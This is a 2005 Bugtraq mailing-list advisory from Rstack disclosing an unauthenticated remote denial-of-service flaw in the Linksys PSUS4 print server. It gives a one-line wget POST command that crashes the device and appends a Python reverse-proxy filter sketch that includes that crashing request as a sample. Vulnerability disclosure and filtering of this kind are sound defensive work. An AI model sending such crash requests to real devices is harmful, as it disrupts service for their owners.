List: bugtraq
Subject: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
From: laurent oudot <oudot () rstack ! org>
Date: 2005-02-03 22:49:16
Message-ID: 20050203224916.32663.qmail () www ! securityfocus ! com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Linksys PSUS4 remote Denial of Service
Date: February 02, 2005
ID: 200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Background
==========
PSUS4 is one of the small embedded Linksys wired print servers.
Affected products
=================
Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)
Description
===========
The Rstack team found a tiny denial of service on the Linksys PSUS4. This device has
problems handling some weird, ugly HTTP requests. No password is needed.
Here is an example that crashes a remote PSUS4:
$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05-- http://192.168.1.2/
=> `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...
=> And the PSUS4 is crashed.
Impact
======
A remote attacker could crash the device (DOS).
Workaround
==========
There is no official workaround at this time. Linksys has been contacted and a patch
should be available in the future (*). If needed, you can try to filter incoming
requests with a dedicated reverse proxy, but that might be too heavy a
solution for such a small device (hint: a reboot will be necessary after each
crash).
(*) "or not"...
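
The filtering workaround above, sketched as the forwarding decision a reverse proxy in front of the print server could apply. This is an added example, not code from Rstack or Linksys. The allowed methods, the size limit, the /settings path and the rule that POST bodies must be name=value form data are assumptions; the advisory does not say which property of the request triggers the crash, so this policy is not known to cover every crashing request.

```python
from urllib.parse import parse_qsl

ALLOWED_METHODS = {"GET", "HEAD", "POST"}  # assumed policy, not from the advisory
MAX_BODY = 4096                            # assumed body size limit in bytes
FORM_TYPE = "application/x-www-form-urlencoded"

def check_request(raw: bytes):
    """Return (forward, reason) for one raw HTTP/1.x request seen by the proxy."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False, "incomplete header block"
    try:
        lines = head.decode("ascii").split("\r\n")
        method, target, version = lines[0].split(" ")
    except (UnicodeDecodeError, ValueError):
        return False, "malformed request line"
    if (method not in ALLOWED_METHODS or not target.startswith("/")
            or version not in ("HTTP/1.0", "HTTP/1.1")):
        return False, "request line not allowed"
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            return False, "malformed header"
        headers[name.strip().lower()] = value.strip()
    if method != "POST":
        return (False, "unexpected body") if body else (True, "ok")
    length = headers.get("content-length", "")
    if not length.isdigit() or int(length) != len(body) or len(body) > MAX_BODY:
        return False, "bad Content-Length"
    if headers.get("content-type", "").split(";")[0].strip().lower() != FORM_TYPE:
        return False, "unexpected Content-Type"
    try:
        # strict_parsing rejects any field that is not name=value
        parse_qsl(body.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    except (UnicodeDecodeError, ValueError):
        return False, "body is not key=value form data"
    return True, "ok"

# Constructed samples: the shape of the advisory's wget POST, and a hypothetical form POST.
ADVISORY_POST = (b"POST / HTTP/1.0\r\nHost: 192.168.1.2\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n"
                 b"Content-Length: 10\r\n\r\nBr1Ce2N1c3")
FORM_POST = (b"POST /settings HTTP/1.1\r\nHost: 192.168.1.2\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n"
             b"Content-Length: 13\r\n\r\nname=printer1")

if __name__ == "__main__":
    for sample in (ADVISORY_POST, FORM_POST):
        print(check_request(sample))
```

Anything the function rejects should be answered by the proxy itself and logged, never forwarded to the device.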